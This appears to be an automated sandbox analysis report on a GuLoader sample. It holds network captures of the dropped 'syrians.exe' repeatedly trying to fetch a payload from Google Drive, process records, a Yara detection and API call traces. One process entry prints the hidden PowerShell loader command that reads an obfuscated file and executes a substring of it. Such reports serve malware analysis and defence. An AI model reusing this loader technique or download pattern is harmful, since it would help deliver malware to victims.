2025-01-11 04:10:27 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:27 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-LCympD-as9TLDET5gx2Ojw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	54078	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:28 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:29 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSKWq7rFuaub8P3Wbr1O4CPN_RiKq0pJzIwh34cJeGqKSqg4JQAkgxk-TwMlDymM2KwfcUAceU Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:28 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-W3sRi92h2xiOzcIrda7Hvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:29 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 63 6c 4a 72 4f 70 4b 54 7a 67 31 56 4f 62 74 72 72 54 6f 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VclJrOpKTzg1VObtrrToMg">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	54079	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:29 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:30 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:30 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'nonce-LNNo2hhQ2tK5pcd_kWhwhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	54080	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:30 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:31 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgRD2P9-tld17BPA4x6rojvb3EHsaI6EkkZ74h3QufBxin39Eia4efOrLi7LSoy_4X7F Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:31 GMT Content-Security-Policy: script-src 'nonce-NaNaa_Q7W2g9o4Ct25SzZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:31 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 56 39 77 69 75 59 50 6c 36 42 65 6f 57 51 4b 76 42 58 71 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="JV9wiuYPl6BeoWQKvBXqLQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	54081	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:32 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:32 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:32 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'nonce-uH1iA_EW4zjbyT6jSq3J3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	54082	142.250.186.33	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:33 UTC	464	OUT	GET /download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:33 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgSpASG6-00-XCKr4aRYxZSiC542y1GZg1XxU41rT2gjgfOEcapmsm2Dj9P00zMHgop9EkpNSSM Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:33 GMT Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-Kk11waH5Gb97mblch7yNtQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 04:10:33 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 6b 32 5a 4f 78 5a 6c 70 53 42 66 4a 41 55 5a 50 74 63 6a 6d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ck2ZOxZlpSBfJAUZPtcjmA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	54083	142.250.186.174	443	364	C:\Users\user\AppData\Local\Temp\syrians.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 04:10:34 UTC	422	OUT	GET /uc?export=download&id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1
2025-01-11 04:10:34 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 04:10:34 GMT Location: https://drive.usercontent.google.com/download?id=10cDD0TLmZ6XMQKo5PEWuxHTM77jDPcbo&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-L8Ey_QXlm6Bpe1K67sXklA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	23:08:28
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\7uY105UTJU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7uY105UTJU.exe"
Imagebase:	0x400000
File size:	724'035 bytes
MD5 hash:	81EE208A058EFEBDDABD4F78FFF047D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	23:08:29
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$johannine=gc -raw 'C:\Users\user\AppData\Roaming\erstatningsgraden\Successively.Ton';$Elitism=$johannine.SubString(69953,3);.$Elitism($johannine) "
Imagebase:	0x8a0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:08:29
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:09:41
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\Temp\syrians.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\syrians.exe"
Imagebase:	0x400000
File size:	724'035 bytes
MD5 hash:	81EE208A058EFEBDDABD4F78FFF047D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3373713233.000000000400B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs Detection: 61%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.5%
Total number of Nodes:	1350
Total number of Limit Nodes:	30

Executed Functions

Function 00403532 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403555
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403580
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403593
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040362C
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403669
OleInitialize.OLE32(00000000), ref: 00403670
SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 0040368F
GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A4
CharNextW.USER32(00000000,"C:\Users\user\Desktop\7uY105UTJU.exe",00000020,"C:\Users\user\Desktop\7uY105UTJU.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036DD
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403815
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403826
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403832
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040384E
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385F
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403867
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387B
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\7uY105UTJU.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403954

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

wsprintfW.USER32 ref: 004039B1
GetFileAttributesW.KERNEL32( abbina",C:\Users\user\AppData\Local\Temp\), ref: 004039E4
DeleteFileW.KERNEL32( abbina"), ref: 004039F0
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1E

Part of subcall function 00406317: MoveFileExW.KERNEL32(?,?,00000005,00405E15,?,00000000,000000F1,?,?,?,?,?), ref: 00406321

CopyFileW.KERNEL32(C:\Users\user\Desktop\7uY105UTJU.exe, abbina",00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A34

